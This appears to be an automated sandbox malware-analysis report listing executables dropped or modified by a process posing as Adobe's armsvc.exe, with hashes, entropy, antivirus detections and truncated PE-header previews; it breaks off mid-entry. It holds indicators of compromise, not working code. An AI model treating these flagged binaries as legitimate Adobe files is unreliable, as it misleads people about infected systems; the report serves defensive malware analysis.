                                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......m%.;)D.h)D.h)D.hF .i3D.hF .i.D.hF .i3D.h..2h(D.h:".i2D.h:".i.D.h:".i.D.hF .i(D.h)D.h,E.hF .i$D.h)D.h.E.hh#.ilE.hh#.i(D.hh#.h(D.h)Dbh/D.hh#.i(D.hRich)D.h................PE..L....vS\.........."......v...J....................@.................................`O..................................l...L...........0.w.............................T...................4.......x...@...............L............................text...%t.......v.................. ..`.rdata..VM.......N...z..............@..@.data...............................@....rsrc...0.w.......w..z..............@..@.reloc...p...p...`..................@...................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):26760704
Entropy (8bit):7.989745711270434
Encrypted:false
SSDEEP:393216:Tg7Wcit8jq7MhRzliy3XYfZCuyB7PArYxeAmIn6F8/I0TFDS0a6CGCcd/RUf:PehRaEuEAzAmIn0P0TFDSf2
MD5:5CB61EDFC20E517720F495A6E8E6642C
SHA1:02D8E2E75C71921BC01D9B5589B80D36DC6F5198
SHA-256:A68D3AD379126DD7F91E774EEF454B1D562521BE039E06729F61D9D9D2C9FD77
SHA-512:67A99C01FEA1C520B37E31F00D59BE00FDCB4B425D7896C445C7D80E528F3256333B066796ADFC03703BC2611072A5B774729AAE747D2B6BA6FD520AF0B36935
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3098624
Entropy (8bit):6.592253991459694
Encrypted:false
SSDEEP:49152:N5AEcdj/MDDBAq1gw3y0GbhygZ4O8b8ITDnlqFWH0gFIDRRAubt5M:N5ABgf2qT3xVUf
MD5:BA6CD99497B3D70E7AC70317874BEF54
SHA1:4687663275EAD376914913FE653ECF74B9D489A9
SHA-256:5B8E4AADE948E30A3BC6D16D639D467239080AF2DC7E6325D240AD529A447988
SHA-512:9A259FF8BF6A1C42421DA69D73AFF8007E6CFA13CD93F2CA1699C6A7D55BF2260FB9D5005DDDDC7F7A873A9F6DCD47C86301B7DAF2B08C0B9A8F47053B2FE1E6
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1520128
Entropy (8bit):4.028202088457785
Encrypted:false
SSDEEP:12288:EOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:EuVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:D8735E55F68AEBA6224702FD5D4ECC27
SHA1:E1E657F15980C381AA51866310A32C3FECD3332A
SHA-256:A62FADC378F7AC30F4DE8CCCA1C4C1541B6DBB19CF6DAD401A3930C6444686D5
SHA-512:E996E1AFF64DE80679ACE064CB13FC8C05B5B02A78276FC5B9CF66EA7F4DA6CCC1F9FA80C2A86DC871B4B6FD3945DC360E1E8EE98DD0C9997BF1CA7874F4F968
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1537024
Entropy (8bit):4.0750608496375476
Encrypted:false
SSDEEP:12288:VbV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:VxVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:8043E7529E75069550A338B28440D05D
SHA1:E628534A1FF2A2CBB4B74A80AAF578EA830A6082
SHA-256:4DCEAD6AD5F5547B3E3D857430D85436E8EC04EC76790DEAB0A744F8AB8D10DC
SHA-512:A61A8416CB7878C24D4BCE709888EF2DDB4B187A65DAF9A6F153F2AF016EB7853C13782741C673E63C32C91DBEE450B4FEA915D23B2A6CD674DBDA3DC13065B4
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):6506496
Entropy (8bit):6.7900703234484
Encrypted:false
SSDEEP:98304:awn75ZycAIHTHsxr/xnYrs4BAxxQEW5Uf:r7w0HcywF0Uf
MD5:CA8C2323636725D49B9D3CE32A16D213
SHA1:1A41FDDCF2CAD82F8DF0DE02CBA49BD34DE9444C
SHA-256:1B5FE2AEF099F869B08B70A10A1703BEB25C0A40FE5BD57354B41540CA315CB7
SHA-512:56EC5D440D629C6587A1E44D4510C4DF8E5C41B7D8A92971B68FC57E656EA1F023F7B3AC66476C9AB01BAB930CB58E703B0CACD1ADFFC381D579C0705F819210
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1637888
Entropy (8bit):4.27976833697124
Encrypted:false
SSDEEP:12288:qk9WbSIlaftV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ONgffVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:4E1B7382BF495F8A51ADCE4AEA3495C4
SHA1:9C839D52E3817E58DA726C9DB3CC5DEC418634F4
SHA-256:B24789921987FDC29EC31C32DAEE9E6B002370113088CEDD1987569BD74F363C
SHA-512:7438AB682424CCBB1652A259F617146310C8A20D4C62C90C4E8C1CD3B148FC64F0A37AD404979B134DE8B49BFCAF86BB2C926FB979098AC09BF4B49341C3DA4D
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1583616
Entropy (8bit):4.162177050945906
Encrypted:false
SSDEEP:12288:DV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:pVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:0DD0F72160CD7216C85E9B5EBF27599E
SHA1:92C83F1CCC23BF55B2C51673F822EE9AC3B1DE25
SHA-256:D33CBE07BAFBCA83222989E3E89E233588EA5B1398A057BD83FC0C5D40495D38
SHA-512:C853B7B1D6E8838BE2694317B9711EC1E2D265FC4A0A3FF1FA689A20710A377DCC07088273418850D2C4DDF51DD0074DE403A8BB43F8BA8A353732D514F0E0F2
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1707008
Entropy (8bit):4.406026005466474
Encrypted:false
SSDEEP:12288:WRY+FUBAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Wu+qBsVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:A99D6FF89B6EE86B52E6359871AFA6A0
SHA1:F5DF8E85DAE6514A921D8B7CBD8549EC6833A124
SHA-256:0216CF415D0DC8C3FF573802C380F74446E37AE8A9FEBEF767C0C88B8A7C32E8
SHA-512:5E1662EA27354E02D8F5F35BA19D613B20DD570852AB8CF67BD80F4BB61511C7DC94D6E2BAB040B83CCEAD54637FD5499A15359DFFF1722BF9C492766AC4F986
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1843200
                                                                                                                                                                Entropy (8bit):4.587554167916646
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:7KhyDZTRW8fdeLVg9N9JMlDlfjRiVuVsWt5MJMs:7K0DZT88fmgFIDRRAubt5M
                                                                                                                                                                MD5:E426DA684F5DD9483B572E354F9C2E9B
                                                                                                                                                                SHA1:4DBE45525F1BA3B27A05AD755CDA07D7FF1E47E0
                                                                                                                                                                SHA-256:3A0A679943326BD6A0733EBDFAE6BC9A40F194EA03AAEF5157FFD8F93628DEFD
                                                                                                                                                                SHA-512:526DE92544CAA4683B446A9B18E21779E667C3E5DFF7122E3A2C1F480D2EF9F7FABF3EAB0C72EE0DB2E2FE539E84D918D3166A4CE485AA4A20A30A69BFB843AD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d... _.l...].`...^.q...[.`..._.m.....e..C...n..d......).k..C.C.r..C.Y.e..d...e..C.\.e..Richd..................PE..L......X............................-.............@..........................`.......&..................................................P...............................................................@............................................text...k........................... ..`.rdata..............................@..@.data...l...........................@....rsrc...P...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1577472
                                                                                                                                                                Entropy (8bit):4.157281945299063
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:gYmIjE72V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:g7mVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:04408308F16C1D6310905555DBBDB31B
                                                                                                                                                                SHA1:EDEFFD82269C62B559A351BE39C78C2B581FA983
                                                                                                                                                                SHA-256:5EDF76B9D4349429EEA2F8F37862901C85F9B5858C2E4212121AFAC1784879D9
                                                                                                                                                                SHA-512:A0335B4785A8A3B9C4CE0CD1D6D60BE77897B5C506E5A6F4D49ABBEFB973239BCB3BEB16123FB1D2D34070B538D7504B8C8681D3C2D47981273457C9B217A151
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................T.............................{............................Rich..........................PE..L.....6P.....................f......<3............@..........................`......i_..........................................x....P..............................................................p...@............................................text...)........................... ..`.rdata..v7.......8..................@..@.data...$-... ......................@....rsrc........P......................@..@.reloc.......`......."..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1595392
                                                                                                                                                                Entropy (8bit):4.195270947705186
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:e5YyV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:exVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:93ECC0182FD713DB083D28EB0774B76C
                                                                                                                                                                SHA1:E336788384C1A559F0EF74A0BF5A15EEC193C63E
                                                                                                                                                                SHA-256:5F2C1694CDF9DF24A7F4E8C3EF6DF744AF58F61411DF22CD2E6E1E6D6606D302
                                                                                                                                                                SHA-512:198AB2E8771409234260197AFE3ABEF48BEFF3BB2D4F0FAEE65618A6039AAB9F3C034A7E6E867C5114F3E4B838AEBA5A0E819315E956A85119900FAFC1AC1298
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n..n..n..?"..n..<...n..<#..n..<...n..<"..n.~....n.~....n..n.7n..."..n...&..n..<...n..nT..n......n.Rich.n.................PE..L...f..Y.....................b...............0....@..................................g......................................._......................................P2..8............................;..@............0...............................text............................... ..`.rdata..4<...0...>... ..............@..@.data........p.......^..............@....rsrc................b..............@..@.reloc...............h..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1732608
                                                                                                                                                                Entropy (8bit):4.386290156972333
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:ZZKK0HMYcykV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:3ZpbVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:898B09A3E346C141493C7DEAD503AC53
                                                                                                                                                                SHA1:810EF47FFAA4FAE8B917CD51A350F2B8161333BF
                                                                                                                                                                SHA-256:53900E600713BCB8A95F17627953DA895E9EB6203F87427F21EC7BBAF079E048
                                                                                                                                                                SHA-512:C68A1B8D9BDD62F8ACE8A197D7EA8F31B6C52003B3C693B57B09EE882E34CE94E9AC81999761136D8C58FEC7546039477569918171F29D1AAB721E9A8012F62D
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G............E......E.,....E...;..D......%=.....%8.........D.......(......d....D-....Rich...................PE..d...t..Y.........."......T...h......XC.........@.....................................F.... .................................................PV..d...............X................... t..8...............................p............p..x............................text....R.......T.................. ..`.rdata.......p.......X..............@..@.data...pE...p... ...L..............@....pdata..X............l..............@..@.rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1543168
                                                                                                                                                                Entropy (8bit):4.075564156725552
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:RFyiV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Hy6Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:5797A8B1CAF52315AD82E580FACFC1E6
                                                                                                                                                                SHA1:27E45EEED5F73D27A52A748559CCFFF128B0F30B
                                                                                                                                                                SHA-256:D2ED6F86AA37CFCAC56D790359E087E67D8A21BD6AAFFD44B856D471ACA5CE8F
                                                                                                                                                                SHA-512:B4FCDFB144D9519346F5EC8B82A3CA6A38FDC1A42D067BC6B9EA1D49967D2661CE2CCDF1D7AA082DEEF5EFDE78097D1BD231F2734BBE016941D7847DF49F7D38
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................_..................................................3......[..........Rich...........................PE..L...[..\.................P...d.......P.......`....@.....................................................................................p...........................p...T..............................@............`...............................text....N.......P.................. ..`.rdata..rG...`...H...T..............@..@.data...\...........................@....rsrc...p...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1599488
                                                                                                                                                                Entropy (8bit):4.16638758560332
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:irQl8HoaV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:5hiVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:CA49B6DF517028B16EDE32892D2AFFDE
                                                                                                                                                                SHA1:9713125FA4944BFD4B0200D947A9FC334B957681
                                                                                                                                                                SHA-256:D0D6FCFFB81FBBDB95FDCBC1448C2F3D1789A3E025C5B12C7E64BDCCA5FA9FDC
                                                                                                                                                                SHA-512:92980ABB3255EAD24379EAEF98B1ECCA973AE35FDE4F4284F5FEEE0550C95E3C5B9F518F162E1FCC10706386A176971E2C319A532C376E56EBB560D9D4556C34
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...NY..NY..NY.JX..NY.MX..NY.KX..NY..MX..NY..KX..NY..JX..NY.OX..NY..OY..NY.KX..NY..Y..NY...Y..NY.LX..NYRich..NY................PE..d......\.........."............................@.......................................... .................................................\k..(...................................PV..T............................V..................@............................text... ........................... ..`.rdata..............................@..@.data................h..............@....pdata...............r..............@..@.rsrc...............................@..@.reloc..............................@...........................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1687552
                                                                                                                                                                Entropy (8bit):4.313818645494306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:1TjfjLHPQMNUV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:trnhWVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:75D97E572A9013194CAE6738A4FB31C7
                                                                                                                                                                SHA1:5EFBB68D9F7982E2DEAEAEB4B450593632709E2F
                                                                                                                                                                SHA-256:45C882127753B3D5756BA1FF9FAC3FF9AA201BD496D7220BBA33131AD87622E3
                                                                                                                                                                SHA-512:0EA690AC32F9A33936F1AEAA5CA87E52D39CF3B589779AEE09D7BF3EC03D982573CCB9C3B1F9962A4624A852861C6297DE9F114952D8557295098E70E111B53A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z.H.Z.H.Z.H...H.Z.H..#H.Z.H.."H.Z.H."PH.Z.H.Z.H.Z.H).&H.Z.H...H.Z.H.ZTH.Z.H)..H.Z.HRich.Z.H................PE..L......U..........................................@...........................".....x...........................................<.......................................................................@............................................text............................... ..`.rdata..Z).......*..................@..@.data...h...........................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1699840
                                                                                                                                                                Entropy (8bit):4.438659403542636
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:Stymff2j6BaOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Mc6B/Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:0C5634087A7A7068E21A81F375727BD7
                                                                                                                                                                SHA1:9BDFEAA5BC124E619999D32939FDE60B82CAEE90
                                                                                                                                                                SHA-256:A1EA1F9A370835EAF7E9DC1C5942CCAF1B0A77B251F0062138F46456A87D8E97
                                                                                                                                                                SHA-512:0884C44F4E7B36EBE5DDCF4CD16CE6A909CDF298C2E2112A97BC66049D56E00CFD49E956292D8550038E45120AC6B8C6AC700BE3A0E4D0C9426CDF1B6A80692B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U2s.4\ .4\ .4\ .f. .4\ .f. .4\ .f. .4\ .L. .4\ .4] m4\ w.. .4\ .f. .4\ .4. .4\ w.. .4\ Rich.4\ ................PE..L......U.........."..................c............@...........................'......5.......................................f..........0............................................................a..@............................................text...G........................... ..`.rdata...d.......f..................@..@.data...L............f..............@....rsrc...0............x..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1719296
                                                                                                                                                                Entropy (8bit):4.435603618413048
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:rZ1Cjmff2jrV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:rZ1nchVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:AEFE4C5BE8C5EF6327CDAF133F7CC9F1
                                                                                                                                                                SHA1:2D704BDF5DE5CD64C2CC8420094C7A64239DBABE
                                                                                                                                                                SHA-256:AD79A3793E07A165135CE6A4598EF238EB0D9208B13231DB3EF7166EC29E8C79
                                                                                                                                                                SHA-512:3883704CBB891340828CA77B07322E3C4F7A5D6CF94B0747E9E7E963686D0ED5D336016288BAC56E5A169F1544BC9AA2C46A74D2587D5EAA37DDD127C371DB18
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................f......g.....X..........._...^.b.....\........^.Y...Rich..........PE..d......U.........."..........,......|y.........@.............................P'......_.... .............................................................0...............................................................p............0..@............................text............................... ..`.rdata.......0....... ..............@..@.data...............................@....pdata..............................@..@.rsrc...0...........................@..@.reloc.......`.......\..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1964032
                                                                                                                                                                Entropy (8bit):7.7204574288691346
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:W4q2jqcpGen6e9zVvZUDZngFIDRRAubt5M:W4q/YB68VvZtUf
                                                                                                                                                                MD5:0F31D923017D4C09697139E9672FFFEE
                                                                                                                                                                SHA1:F2E8CD046379687EDBD1C930CA5627A663D547BA
                                                                                                                                                                SHA-256:1BFD3673EC9ADEBC9E4C249BCF7090232121AEE16A7AC5220B7014EA3E6875F3
                                                                                                                                                                SHA-512:5F89E25E1AB89E46EA4AB1F7705E0EA8D07FEECA4D18E8FCD0D62131144CB61F72322B50E1F3B739D27114D0DFF830AC05242184D82704601C3566B25A8B079C
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S.....S......S.....S..C...S..C...S..R.!.S.b"....S.....S.....S.b"...S.Rich.S.........................PE..L......U..........#..................v............@..........................`.......n...................................................|...........................................................i..@............................................text............................... ..`.rdata..<...........................@..@.data...lW....... ..................@....rsrc....`.......P..................@...................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2005504
                                                                                                                                                                Entropy (8bit):7.675161153877697
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:A4Ext4q2jqcpGen6e9zVvZUDZngFIDRRAubt5M:An4q/YB68VvZtUf
                                                                                                                                                                MD5:81BBA3A263CBEAC75B842C1B8DA770E0
                                                                                                                                                                SHA1:42C1A8C25CB3CF68601C7AF00F3113B4590CE1B9
                                                                                                                                                                SHA-256:2C6E5EB5D8E277B7328A8EE0143CF21D61F4FB3969CAEC655A3C32DDB7990E1D
                                                                                                                                                                SHA-512:8E382FD4887A54551063AF15087D65F7C4A5BEB865D7EFFF6D42E43C3C6D9FFB3C59B1F174C7C41B54DE77AB160755D436F4368A99F626FCBA857C5652F748E0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............H..H..H..pHr..H..OH..H..qH.H.E^H..H.E[H..H..H)..Hf$uH.H..KH..H..H..Hf$NH..HRich..H........PE..d......U..........#............................@.....................................`.... .................................................t............|..........................................................`...p............................................text...{........................... ..`.rdata...C.......D..................@..@.data....k... ...,..................@....pdata........... ...*..............@..@.rsrc....`.......P...J..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1610752
                                                                                                                                                                Entropy (8bit):4.148018510943642
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:PvXk1EV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:3k14Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:E48801CC2E48B078A0771680629B02BC
                                                                                                                                                                SHA1:750A2B38C492474CCCC96A99F15F343BA5D48BED
                                                                                                                                                                SHA-256:98132325142A5627663B923238B5466884BECAE87EF7BD1A59967280F6355469
                                                                                                                                                                SHA-512:D8C18FB33432F512DAF4B7BEBAA927A53C9D01B883B7FC2B830D0A4880EE7C0B7DC405FE2941F88E522ACE6066DEAC64DD454A7C55C664216EEDEDE18936594B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........c...c...c...1I..c...1w..c...1H.c....;..c...c..c....,..c..x.M..c...1s..c...c?..c..x.v..c..Rich.c..........PE..L......U............................k!............@..................................7......................................|...d....p..................................................................@...............p............................text............................... ..`.rdata...R.......T..................@..@.data....2...0......................@....rsrc........p......................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1630720
                                                                                                                                                                Entropy (8bit):7.232816007706908
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:cUdZ4gviAgdj8pRIy+taTPigFIDRRAubt5M:cR5j8pDrUf
                                                                                                                                                                MD5:80849CEF08FA58BE5BD6D74445FE4E70
                                                                                                                                                                SHA1:3BCA76567CCFD0CE2B47DA0D63607CBDAEF368C7
                                                                                                                                                                SHA-256:B9105E5B148478FA991267C8D287FA2FE66A0D6018E641BA473DA7F7970E6DD1
                                                                                                                                                                SHA-512:B4FCEB9B6DD118B9D73D3E46B5D9CAE4A1047D0198FF05EE3E42D537FEB9F19D2125DB54500F87D4C14AA4616A383068BDDDD23E71663C59C893330C5105287B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.Th2.:;2.:;2.:;.b.;3.:;t..;..:;t..;+.:;t..;..:;;..;:.:;;..;3.:;;..;..:;2.;;..:;.\.;b.:;.\.;3.:;?..;3.:;2.;0.:;.\.;3.:;Rich2.:;........................PE..d......U..........".................d..........@.......................................... ...@...............@..............................u..|............p...i..................`...............................p...p............... ............................text...i........................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i...p...j..................@..@.rsrc................Z..............@..@.reloc..............................@...........................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
